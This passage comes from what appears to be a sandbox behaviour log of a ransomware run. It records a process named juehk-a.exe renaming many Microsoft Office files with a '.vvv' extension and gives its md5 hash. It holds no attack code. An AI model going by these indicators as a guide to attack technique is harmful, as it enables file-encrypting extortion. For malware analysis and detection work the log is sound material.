32681.          old_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME27.CSS
32682.          new_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME27.CSS.vvv
32683.            ads:
32684.          fid (ads:): 562949953496492
32685.          ntstatus: 0x0
32686.          CreateOptions: 0x0
32687.        file:
32688.          timestamp: 99391
32689.          mode: rename
32690.          sequenceNumber: 2297
32691.          filesize: 121086
32692.          processinfo:
32693.            pid: 1648
32694.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
32695.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
32696.          old_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME28.CSS
32697.          new_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME28.CSS.vvv
32698.            ads:
32699.          fid (ads:): 562949953496493
32700.          ntstatus: 0x0
32701.          CreateOptions: 0x0
32702.        file:
32703.          timestamp: 99407
32704.          mode: rename
32705.          sequenceNumber: 2298
32706.          filesize: 126190
32707.          processinfo:
32708.            pid: 1648
32709.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
32710.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
32711.          old_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME29.CSS
32712.          new_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME29.CSS.vvv
32713.            ads:
32714.          fid (ads:): 562949953496494
32715.          ntstatus: 0x0
32716.          CreateOptions: 0x0
32717.        file:
32718.          timestamp: 99439
32719.          mode: rename
32720.          sequenceNumber: 2299
32721.          filesize: 120526
32722.          processinfo:
32723.            pid: 1648
32724.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
32725.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
32726.          old_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME30.CSS
32727.          new_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME30.CSS.vvv
32728.            ads:
32729.          fid (ads:): 562949953496495
32730.          ntstatus: 0x0
32731.          CreateOptions: 0x0
32732.        file:
32733.          timestamp: 99456
32734.          mode: rename
32735.          sequenceNumber: 2300
32736.          filesize: 120830
32737.          processinfo:
32738.            pid: 1648
32739.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
32740.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
32741.          old_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME31.CSS
32742.          new_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME31.CSS.vvv
32743.            ads:
32744.          fid (ads:): 562949953496496
32745.          ntstatus: 0x0
32746.          CreateOptions: 0x0
32747.        file:
32748.          timestamp: 99472
32749.          mode: rename
32750.          sequenceNumber: 2301
32751.          filesize: 126158
32752.          processinfo:
32753.            pid: 1648
32754.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
32755.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
32756.          old_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME32.CSS
32757.          new_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME32.CSS.vvv
32758.            ads:
32759.          fid (ads:): 562949953496497
32760.          ntstatus: 0x0
32761.          CreateOptions: 0x0
32762.        file:
32763.          timestamp: 99487
32764.          mode: rename
32765.          sequenceNumber: 2302
32766.          filesize: 122462
32767.          processinfo:
32768.            pid: 1648
32769.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
32770.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
32771.          old_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME33.CSS
32772.          new_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME33.CSS.vvv
32773.            ads:
32774.          fid (ads:): 562949953496498
32775.          ntstatus: 0x0
32776.          CreateOptions: 0x0
32777.        file:
32778.          timestamp: 99588
32779.          mode: rename
32780.          sequenceNumber: 2303
32781.          filesize: 119502
32782.          processinfo:
32783.            pid: 1648
32784.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
32785.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
32786.          old_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME34.CSS
32787.          new_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME34.CSS.vvv
32788.            ads:
32789.          fid (ads:): 562949953496499
32790.          ntstatus: 0x0
32791.          CreateOptions: 0x0
32792.        file:
32793.          timestamp: 99619
32794.          mode: rename
32795.          sequenceNumber: 2304
32796.          filesize: 132254
32797.          processinfo:
32798.            pid: 1648
32799.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
32800.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
32801.          old_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME35.CSS
32802.          new_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME35.CSS.vvv
32803.            ads:
32804.          fid (ads:): 562949953496500
32805.          ntstatus: 0x0
32806.          CreateOptions: 0x0
32807.        file:
32808.          timestamp: 99632
32809.          mode: rename
32810.          sequenceNumber: 2305
32811.          filesize: 123598
32812.          processinfo:
32813.            pid: 1648
32814.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
32815.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
32816.          old_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME36.CSS
32817.          new_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME36.CSS.vvv
32818.            ads:
32819.          fid (ads:): 562949953496501
32820.          ntstatus: 0x0
32821.          CreateOptions: 0x0
32822.        file:
32823.          timestamp: 99646
32824.          mode: rename
32825.          sequenceNumber: 2306
32826.          filesize: 132958
32827.          processinfo:
32828.            pid: 1648
32829.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
32830.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
32831.          old_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME37.CSS
32832.          new_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME37.CSS.vvv
32833.            ads:
32834.          fid (ads:): 562949953496502
32835.          ntstatus: 0x0
32836.          CreateOptions: 0x0
32837.        file:
32838.          timestamp: 99660
32839.          mode: rename
32840.          sequenceNumber: 2307
32841.          filesize: 127518
32842.          processinfo:
32843.            pid: 1648
32844.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
32845.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
32846.          old_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME38.CSS
32847.          new_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME38.CSS.vvv
32848.            ads:
32849.          fid (ads:): 562949953496503
32850.          ntstatus: 0x0
32851.          CreateOptions: 0x0
32852.        file:
32853.          timestamp: 99683
32854.          mode: rename
32855.          sequenceNumber: 2308
32856.          filesize: 124398
32857.          processinfo:
32858.            pid: 1648
32859.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
32860.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
32861.          old_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME39.CSS
32862.          new_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME39.CSS.vvv
32863.            ads:
32864.          fid (ads:): 562949953496504
32865.          ntstatus: 0x0
32866.          CreateOptions: 0x0
32867.        file:
32868.          timestamp: 99697
32869.          mode: rename
32870.          sequenceNumber: 2309
32871.          filesize: 126190
32872.          processinfo:
32873.            pid: 1648
32874.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
32875.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
32876.          old_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME40.CSS
32877.          new_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME40.CSS.vvv
32878.            ads:
32879.          fid (ads:): 562949953496505
32880.          ntstatus: 0x0
32881.          CreateOptions: 0x0
32882.        file:
32883.          timestamp: 99718
32884.          mode: rename
32885.          sequenceNumber: 2310
32886.          filesize: 125694
32887.          processinfo:
32888.            pid: 1648
32889.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
32890.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
32891.          old_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME41.CSS
32892.          new_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME41.CSS.vvv
32893.            ads:
32894.          fid (ads:): 562949953496507
32895.          ntstatus: 0x0
32896.          CreateOptions: 0x0
32897.        file:
32898.          timestamp: 99735
32899.          mode: rename
32900.          sequenceNumber: 2311
32901.          filesize: 121550
32902.          processinfo:
32903.            pid: 1648
32904.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
32905.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
32906.          old_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME42.CSS
32907.          new_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME42.CSS.vvv
32908.            ads:
32909.          fid (ads:): 562949953496508
32910.          ntstatus: 0x0
32911.          CreateOptions: 0x0
32912.        file:
32913.          timestamp: 99750
32914.          mode: rename
32915.          sequenceNumber: 2312
32916.          filesize: 125118
32917.          processinfo:
32918.            pid: 1648
32919.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
32920.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
32921.          old_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME43.CSS
32922.          new_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME43.CSS.vvv
32923.            ads:
32924.          fid (ads:): 562949953496509
32925.          ntstatus: 0x0
32926.          CreateOptions: 0x0
32927.        file:
32928.          timestamp: 99779
32929.          mode: rename
32930.          sequenceNumber: 2313
32931.          filesize: 126622
32932.          processinfo:
32933.            pid: 1648
32934.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
32935.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
32936.          old_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME44.CSS
32937.          new_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME44.CSS.vvv
32938.            ads:
32939.          fid (ads:): 562949953496511
32940.          ntstatus: 0x0
32941.          CreateOptions: 0x0
32942.        file:
32943.          timestamp: 99793
32944.          mode: rename
32945.          sequenceNumber: 2314
32946.          filesize: 125006
32947.          processinfo:
32948.            pid: 1648
32949.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
32950.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
32951.          old_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME45.CSS
32952.          new_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME45.CSS.vvv
32953.            ads:
32954.          fid (ads:): 562949953496512
32955.          ntstatus: 0x0
32956.          CreateOptions: 0x0
32957.        file:
32958.          timestamp: 99808
32959.          mode: rename
32960.          sequenceNumber: 2315
32961.          filesize: 130910
32962.          processinfo:
32963.            pid: 1648
32964.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
32965.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
32966.          old_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME46.CSS
32967.          new_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME46.CSS.vvv
32968.            ads:
32969.          fid (ads:): 562949953496513
32970.          ntstatus: 0x0
32971.          CreateOptions: 0x0
32972.        file:
32973.          timestamp: 99820
32974.          mode: rename
32975.          sequenceNumber: 2316
32976.          filesize: 127806
32977.          processinfo:
32978.            pid: 1648
32979.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
32980.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
32981.          old_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME47.CSS
32982.          new_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME47.CSS.vvv
32983.            ads:
32984.          fid (ads:): 562949953496515
32985.          ntstatus: 0x0
32986.          CreateOptions: 0x0
32987.        file:
32988.          timestamp: 99854
32989.          mode: rename
32990.          sequenceNumber: 2317
32991.          filesize: 129838
32992.          processinfo:
32993.            pid: 1648
32994.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
32995.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
32996.          old_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME48.CSS
32997.          new_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME48.CSS.vvv
32998.            ads:
32999.          fid (ads:): 562949953496516
33000.          ntstatus: 0x0
33001.          CreateOptions: 0x0
33002.        file:
33003.          timestamp: 99869
33004.          mode: rename
33005.          sequenceNumber: 2318
33006.          filesize: 121870
33007.          processinfo:
33008.            pid: 1648
33009.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
33010.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
33011.          old_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME49.CSS
33012.          new_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME49.CSS.vvv
33013.            ads:
33014.          fid (ads:): 562949953496517
33015.          ntstatus: 0x0
33016.          CreateOptions: 0x0
33017.        file:
33018.          timestamp: 99899
33019.          mode: rename
33020.          sequenceNumber: 2319
33021.          filesize: 127422
33022.          processinfo:
33023.            pid: 1648
33024.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
33025.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
33026.          old_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME50.CSS
33027.          new_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME50.CSS.vvv
33028.            ads:
33029.          fid (ads:): 562949953496518
33030.          ntstatus: 0x0
33031.          CreateOptions: 0x0
33032.        file:
33033.          timestamp: 99915
33034.          mode: rename
33035.          sequenceNumber: 2320
33036.          filesize: 123150
33037.          processinfo:
33038.            pid: 1648
33039.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
33040.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
33041.          old_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME51.CSS
33042.          new_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME51.CSS.vvv
33043.            ads:
33044.          fid (ads:): 562949953496520
33045.          ntstatus: 0x0
33046.          CreateOptions: 0x0
33047.        file:
33048.          timestamp: 99932
33049.          mode: rename
33050.          sequenceNumber: 2321
33051.          filesize: 123902
33052.          processinfo:
33053.            pid: 1648
33054.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
33055.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
33056.          old_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME52.CSS
33057.          new_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME52.CSS.vvv
33058.            ads:
33059.          fid (ads:): 562949953496521
33060.          ntstatus: 0x0
33061.          CreateOptions: 0x0
33062.        file:
33063.          timestamp: 99960
33064.          mode: rename
33065.          sequenceNumber: 2322
33066.          filesize: 125006
33067.          processinfo:
33068.            pid: 1648
33069.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
33070.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
33071.          old_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME53.CSS
33072.          new_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME53.CSS.vvv
33073.            ads:
33074.          fid (ads:): 562949953496522
33075.          ntstatus: 0x0
33076.          CreateOptions: 0x0
33077.        file:
33078.          timestamp: 99974
33079.          mode: rename
33080.          sequenceNumber: 2323
33081.          filesize: 127502
33082.          processinfo:
33083.            pid: 1648
33084.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
33085.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
33086.          old_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME54.CSS
33087.          new_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME54.CSS.vvv
33088.            ads:
33089.          fid (ads:): 562949953496523
33090.          ntstatus: 0x0
33091.          CreateOptions: 0x0
33092.        file:
33093.          timestamp: 99989
33094.          mode: rename
33095.          sequenceNumber: 2324
33096.          filesize: 123582
33097.          processinfo:
33098.            pid: 1648
33099.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
33100.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
33101.          old_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME55.CSS
33102.          new_name: C:\Program Files\Microsoft Office\Office15\1033\PUBFTSCM\SCHEME55.CSS.vvv
33103.            ads:
33104.          fid (ads:): 562949953496524
33105.          ntstatus: 0x0
33106.          CreateOptions: 0x0
33107.        file:
33108.          timestamp: 100338
33109.          mode: rename
33110.          sequenceNumber: 2325
33111.          filesize: 16958
33112.          processinfo:
33113.            pid: 1648
33114.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
33115.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
33116.          old_name: C:\Program Files\Microsoft Office\Office15\ADDINS\Power View Excel Add-in\BI-Report.png
33117.          new_name: C:\Program Files\Microsoft Office\Office15\ADDINS\Power View Excel Add-in\BI-Report.png.vvv
33118.            ads:
33119.          fid (ads:): 562949953497181
33120.          ntstatus: 0x0
33121.          CreateOptions: 0x0
33122.        high_cpu:
33123.          timestamp: 100904
33124.          sequenceNumber: 2326
33125.          total_cpu: 63.63613053613053
33126.          processinfo:
33127.            tainted: true
33128.            pid: 2312
33129.            process_cpu: 63.63613053613053
33130.            imagepath: C:\Users\Administrator\AppData\Local\Temp\73.exe
33131.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
33132.        file:
33133.          timestamp: 101196
33134.          mode: rename
33135.          sequenceNumber: 2327
33136.          filesize: 1502
33137.          processinfo:
33138.            pid: 1648
33139.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
33140.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
33141.          old_name: C:\Program Files\Microsoft Office\Office15\Configuration\card_expiration_terms_dict.txt
33142.          new_name: C:\Program Files\Microsoft Office\Office15\Configuration\card_expiration_terms_dict.txt.vvv
33143.            ads:
33144.          fid (ads:): 562949953501060
33145.          ntstatus: 0x0
33146.          CreateOptions: 0x0
33147.        file:
33148.          timestamp: 101209
33149.          mode: rename
33150.          sequenceNumber: 2328
33151.          filesize: 2670
33152.          processinfo:
33153.            pid: 1648
33154.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
33155.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
33156.          old_name: C:\Program Files\Microsoft Office\Office15\Configuration\card_security_terms_dict.txt
33157.          new_name: C:\Program Files\Microsoft Office\Office15\Configuration\card_security_terms_dict.txt.vvv
33158.            ads:
33159.          fid (ads:): 562949953501063
33160.          ntstatus: 0x0
33161.          CreateOptions: 0x0
33162.        file:
33163.          timestamp: 101233
33164.          mode: rename
33165.          sequenceNumber: 2329
33166.          filesize: 5502
33167.          processinfo:
33168.            pid: 1648
33169.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
33170.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
33171.          old_name: C:\Program Files\Microsoft Office\Office15\Configuration\card_terms_dict.txt
33172.          new_name: C:\Program Files\Microsoft Office\Office15\Configuration\card_terms_dict.txt.vvv
33173.            ads:
33174.          fid (ads:): 562949953501065
33175.          ntstatus: 0x0
33176.          CreateOptions: 0x0
33177.        file:
33178.          timestamp: 101256
33179.          mode: rename
33180.          sequenceNumber: 2330
33181.          filesize: 6334
33182.          processinfo:
33183.            pid: 1648
33184.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
33185.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
33186.          old_name: C:\Program Files\Microsoft Office\Office15\Configuration\ssn_high_group_info.txt
33187.          new_name: C:\Program Files\Microsoft Office\Office15\Configuration\ssn_high_group_info.txt.vvv
33188.            ads:
33189.          fid (ads:): 562949953501070
33190.          ntstatus: 0x0
33191.          CreateOptions: 0x0
33192.        file:
33193.          timestamp: 101424
33194.          mode: rename
33195.          sequenceNumber: 2331
33196.          filesize: 1150
33197.          processinfo:
33198.            pid: 1648
33199.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
33200.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
33201.          old_name: C:\Program Files\Microsoft Office\Office15\Groove\Certificates\groove.net\Components\SignedComponents.cer
33202.          new_name: C:\Program Files\Microsoft Office\Office15\Groove\Certificates\groove.net\Components\SignedComponents.cer.vvv
33203.            ads:
33204.          fid (ads:): 562949953501646
33205.          ntstatus: 0x0
33206.          CreateOptions: 0x0
33207.        file:
33208.          timestamp: 101438
33209.          mode: rename
33210.          sequenceNumber: 2332
33211.          filesize: 1086
33212.          processinfo:
33213.            pid: 1648
33214.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
33215.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
33216.          old_name: C:\Program Files\Microsoft Office\Office15\Groove\Certificates\groove.net\ManagedObjects\SignedManagedObjects.cer
33217.          new_name: C:\Program Files\Microsoft Office\Office15\Groove\Certificates\groove.net\ManagedObjects\SignedManagedObjects.cer.vvv
33218.            ads:
33219.          fid (ads:): 562949953501648
33220.          ntstatus: 0x0
33221.          CreateOptions: 0x0
33222.        file:
33223.          timestamp: 101467
33224.          mode: rename
33225.          sequenceNumber: 2333
33226.          filesize: 1374
33227.          processinfo:
33228.            pid: 1648
33229.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
33230.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
33231.          old_name: C:\Program Files\Microsoft Office\Office15\Groove\Certificates\groove.net\Servers\Management.cer
33232.          new_name: C:\Program Files\Microsoft Office\Office15\Groove\Certificates\groove.net\Servers\Management.cer.vvv
33233.            ads:
33234.          fid (ads:): 562949953501050
33235.          ntstatus: 0x0
33236.          CreateOptions: 0x0
33237.        file:
33238.          timestamp: 101484
33239.          mode: rename
33240.          sequenceNumber: 2334
33241.          filesize: 1406
33242.          processinfo:
33243.            pid: 1648
33244.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
33245.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
33246.          old_name: C:\Program Files\Microsoft Office\Office15\Groove\Certificates\groove.net\Servers\RELAY.CER
33247.          new_name: C:\Program Files\Microsoft Office\Office15\Groove\Certificates\groove.net\Servers\RELAY.CER.vvv
33248.            ads:
33249.          fid (ads:): 562949953499238
33250.          ntstatus: 0x0
33251.          CreateOptions: 0x0
33252.        file:
33253.          timestamp: 101523
33254.          mode: rename
33255.          sequenceNumber: 2335
33256.          filesize: 1358
33257.          processinfo:
33258.            pid: 1648
33259.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
33260.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
33261.          old_name: C:\Program Files\Microsoft Office\Office15\Groove\Certificates\Verisign\Components\VeriSign_Class_3_Code_Signing_2001-4_CA.cer
33262.          new_name: C:\Program Files\Microsoft Office\Office15\Groove\Certificates\Verisign\Components\VeriSign_Class_3_Code_Signing_2001-4_CA.cer.vvv
33263.            ads:
33264.          fid (ads:): 562949953499737
33265.          ntstatus: 0x0
33266.          CreateOptions: 0x0
33267.        file:
33268.          timestamp: 101538
33269.          mode: rename
33270.          sequenceNumber: 2336
33271.          filesize: 1006
33272.          processinfo:
33273.            pid: 1648
33274.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
33275.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
33276.          old_name: C:\Program Files\Microsoft Office\Office15\Groove\Certificates\Verisign\Components\VeriSign_Class_3_Public_Primary_CA.cer
33277.          new_name: C:\Program Files\Microsoft Office\Office15\Groove\Certificates\Verisign\Components\VeriSign_Class_3_Public_Primary_CA.cer.vvv
33278.            ads:
33279.          fid (ads:): 562949953499738
33280.          ntstatus: 0x0
33281.          CreateOptions: 0x0
33282.        file:
33283.          timestamp: 101564
33284.          mode: rename
33285.          sequenceNumber: 2337
33286.          filesize: 1326
33287.          processinfo:
33288.            pid: 1648
33289.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
33290.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
33291.          old_name: C:\Program Files\Microsoft Office\Office15\Groove\Certificates\Verisign\Components\VS_ComponentSigningIntermediate.cer
33292.          new_name: C:\Program Files\Microsoft Office\Office15\Groove\Certificates\Verisign\Components\VS_ComponentSigningIntermediate.cer.vvv
33293.            ads:
33294.          fid (ads:): 562949953499751
33295.          ntstatus: 0x0
33296.          CreateOptions: 0x0
33297.        file:
33298.          timestamp: 101675
33299.          mode: rename
33300.          sequenceNumber: 2338
33301.          filesize: 6254
33302.          processinfo:
33303.            pid: 1648
33304.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
33305.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
33306.          old_name: C:\Program Files\Microsoft Office\Office15\Groove\ToolBMPs\DataListIconImages.jpg
33307.          new_name: C:\Program Files\Microsoft Office\Office15\Groove\ToolBMPs\DataListIconImages.jpg.vvv
33308.            ads:
33309.          fid (ads:): 562949953497330
33310.          ntstatus: 0x0
33311.          CreateOptions: 0x0
33312.        file:
33313.          timestamp: 101726
33314.          mode: rename
33315.          sequenceNumber: 2339
33316.          filesize: 7886
33317.          processinfo:
33318.            pid: 1648
33319.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
33320.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
33321.          old_name: C:\Program Files\Microsoft Office\Office15\Groove\ToolBMPs\GRIP.JPG
33322.          new_name: C:\Program Files\Microsoft Office\Office15\Groove\ToolBMPs\GRIP.JPG.vvv
33323.            ads:
33324.          fid (ads:): 562949953500945
33325.          ntstatus: 0x0
33326.          CreateOptions: 0x0
33327.        file:
33328.          timestamp: 101856
33329.          mode: rename
33330.          sequenceNumber: 2340
33331.          filesize: 3470
33332.          processinfo:
33333.            pid: 1648
33334.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
33335.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
33336.          old_name: C:\Program Files\Microsoft Office\Office15\Groove\ToolBMPs\InformationIcon.jpg
33337.          new_name: C:\Program Files\Microsoft Office\Office15\Groove\ToolBMPs\InformationIcon.jpg.vvv
33338.            ads:
33339.          fid (ads:): 562949953500986
33340.          ntstatus: 0x0
33341.          CreateOptions: 0x0
33342.        file:
33343.          timestamp: 101979
33344.          mode: rename
33345.          sequenceNumber: 2341
33346.          filesize: 53390
33347.          processinfo:
33348.            pid: 1648
33349.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
33350.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
33351.          old_name: C:\Program Files\Microsoft Office\Office15\Groove\ToolBMPs\LoginDialogBackground.jpg
33352.          new_name: C:\Program Files\Microsoft Office\Office15\Groove\ToolBMPs\LoginDialogBackground.jpg.vvv
33353.            ads:
33354.          fid (ads:): 562949953498519
33355.          ntstatus: 0x0
33356.          CreateOptions: 0x0
33357.        file:
33358.          timestamp: 102008
33359.          mode: rename
33360.          sequenceNumber: 2342
33361.          filesize: 8254
33362.          processinfo:
33363.            pid: 1648
33364.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
33365.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
33366.          old_name: C:\Program Files\Microsoft Office\Office15\Groove\ToolBMPs\LoginTool24x24Images.jpg
33367.          new_name: C:\Program Files\Microsoft Office\Office15\Groove\ToolBMPs\LoginTool24x24Images.jpg.vvv
33368.            ads:
33369.          fid (ads:): 562949953498520
33370.          ntstatus: 0x0
33371.          CreateOptions: 0x0
33372.        file:
33373.          timestamp: 102041
33374.          mode: rename
33375.          sequenceNumber: 2343
33376.          filesize: 10126
33377.          processinfo:
33378.            pid: 1648
33379.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
33380.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
33381.          old_name: C:\Program Files\Microsoft Office\Office15\Groove\ToolBMPs\MessageAttachmentIconImages.jpg
33382.          new_name: C:\Program Files\Microsoft Office\Office15\Groove\ToolBMPs\MessageAttachmentIconImages.jpg.vvv
33383.            ads:
33384.          fid (ads:): 562949953501076
33385.          ntstatus: 0x0
33386.          CreateOptions: 0x0
33387.        file:
33388.          timestamp: 102059
33389.          mode: rename
